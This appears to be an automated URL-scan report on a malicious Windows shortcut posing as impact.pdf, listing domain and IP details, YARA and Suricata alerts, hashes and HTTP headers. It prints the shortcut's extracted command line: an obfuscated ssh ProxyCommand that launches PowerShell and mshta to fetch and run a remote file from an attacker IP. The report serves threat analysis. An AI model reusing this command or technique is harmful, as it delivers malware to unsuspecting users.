Report - jolly-payne.194-87-216-96.plesk.page/Documents/impact.pdf.lnk

Report Overview

Visited public
2025-02-19 20:14:25
Tags
URL
jolly-payne.194-87-216-96.plesk.page/Documents/impact.pdf.lnk
Finishing URL
about:privatebrowsing
IP / ASN
194.87.216.96
#215540 Global Connectivity Solutions Llp
Title
about:privatebrowsing

Detections

urlquery

Network Intrusion Detection

Threat Detection Systems

Domain Summary

Domain / FQDN	Rank	Registered	First Seen	Last Seen	Sent	Received	IP
jolly-payne.194-87-216-96.plesk.page	unknown	2020-03-18	2022-11-07	2022-11-07	443 B	2.6 kB	194.87.216.96

Related reports

Network Intrusion Detection Systems

Suricata /w Emerging Threats Pro

Timestamp	Severity	Source IP	Destination IP	Alert
2025-02-19 20:14:05	low	194.87.216.96	Client IP	ET INFO LNK File Downloaded via HTTP

Threat Detection Systems

Public InfoSec YARA rules

Scan Date	Severity	Indicator	Alert
2025-02-19	medium	jolly-payne.194-87-216-96.plesk.page/Documents/impact.pdf.lnk	Identifies PowerShell artefacts in shortcut (LNK) files.
2025-02-19	medium	jolly-payne.194-87-216-96.plesk.page/Documents/impact.pdf.lnk	Identifies executable artefacts in shortcut (LNK) files.
2025-02-19	medium	jolly-payne.194-87-216-96.plesk.page/Documents/impact.pdf.lnk	Identifies download artefacts in shortcut (LNK) files.

OpenPhish

No alerts detected

PhishTank

No alerts detected

Quad9 DNS

No alerts detected

ThreatFox

No alerts detected

Windows Shortcut detected

URL
jolly-payne.194-87-216-96.plesk.page/Documents/impact.pdf.lnk
IP / ASN
194.87.216.96
#215540 Global Connectivity Solutions Llp

File type
MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=11, Unicoded, HasExpIcon "%ProgramFiles%\Microsoft\Edge\Application\msedge.exe", length=0, window=showminnoactive, IDListSize 0x018b, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\"
Hash
MD5 8c635ae5575d6802b1805432a8115889
SHA1 2f91a647553f61e0bb750d92f84c0c8ca72d3109
SHA256 bc4ea240e69a1be4352e753cd9e35adb9ac3cc9d92bdb007d4b11351d50695fe

Timestamps
Created 2185-07-21 23:34:33
Access 2185-07-21 23:34:33
Write 2185-07-21 23:34:33
Command-line data
Working Directory
Relative Path
..\..\..\Windows\System32\OpenSSH\ssh.exe
Command Line Arguments
-o ProxyCommand="powershell powershell (Convert-String -E '1 2 3 4 5=23 1//4/5' -I 'http: ms hta 176.65.134.142 iimpact.mp4')" .

Detections

Analyzer	Verdict	Alert
Public InfoSec YARA rules	malware	Identifies PowerShell artefacts in shortcut (LNK) files.
Public InfoSec YARA rules	malware	Identifies executable artefacts in shortcut (LNK) files.
Public InfoSec YARA rules	malware	Identifies download artefacts in shortcut (LNK) files.

JavaScript (0)

HTTP Transactions (1)

URL IP Response Size

jolly-payne.194-87-216-96.plesk.page/Documents/impact.pdf.lnk

194.87.216.96

200 OK

2.4 kB

URL User Request GET HTTP/1.1
jolly-payne.194-87-216-96.plesk.page/Documents/impact.pdf.lnk
IP
194.87.216.96:80
ASN
#215540 Global Connectivity Solutions Llp

File type
MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=11, Unicoded, HasExpIcon "%ProgramFiles%\Microsoft\Edge\Application\msedge.exe", length=0, window=showminnoactive, IDListSize 0x018b, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\"
Size
2.4 kB (2402 bytes)
Hash
8c635ae5575d6802b1805432a8115889
2f91a647553f61e0bb750d92f84c0c8ca72d3109
bc4ea240e69a1be4352e753cd9e35adb9ac3cc9d92bdb007d4b11351d50695fe

Detections

Analyzer	Verdict	Alert
Public InfoSec YARA rules	malware	Identifies PowerShell artefacts in shortcut (LNK) files.
Public InfoSec YARA rules	malware	Identifies executable artefacts in shortcut (LNK) files.
Public InfoSec YARA rules	malware	Identifies download artefacts in shortcut (LNK) files.

NIDS	Severity	Alert
suricata	low	ET INFO LNK File Downloaded via HTTP

HTTP Headers

GET /Documents/impact.pdf.lnk HTTP/1.1
Host: jolly-payne.194-87-216-96.plesk.page
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 2402
Content-Type: application/x-ms-shortcut
Etag: "1825b082d49b443a962"
Last-Modified: Wed, 19 Feb 2025 18:48:27 GMT
Date: Wed, 19 Feb 2025 20:13:55 GMT

Report Overview

Domain Summary

Related reports

Network Intrusion Detection Systems

Suricata /w Emerging Threats Pro

Threat Detection Systems

Public InfoSec YARA rules

OpenPhish

PhishTank

Quad9 DNS

ThreatFox

Windows Shortcut detected

File type

Hash

Timestamps

Command-line data

JavaScript (0)

HTTP Transactions (1)

URL User Request GET HTTP/1.1

IP

ASN

File type

Size

Hash

Detections

HTTP Headers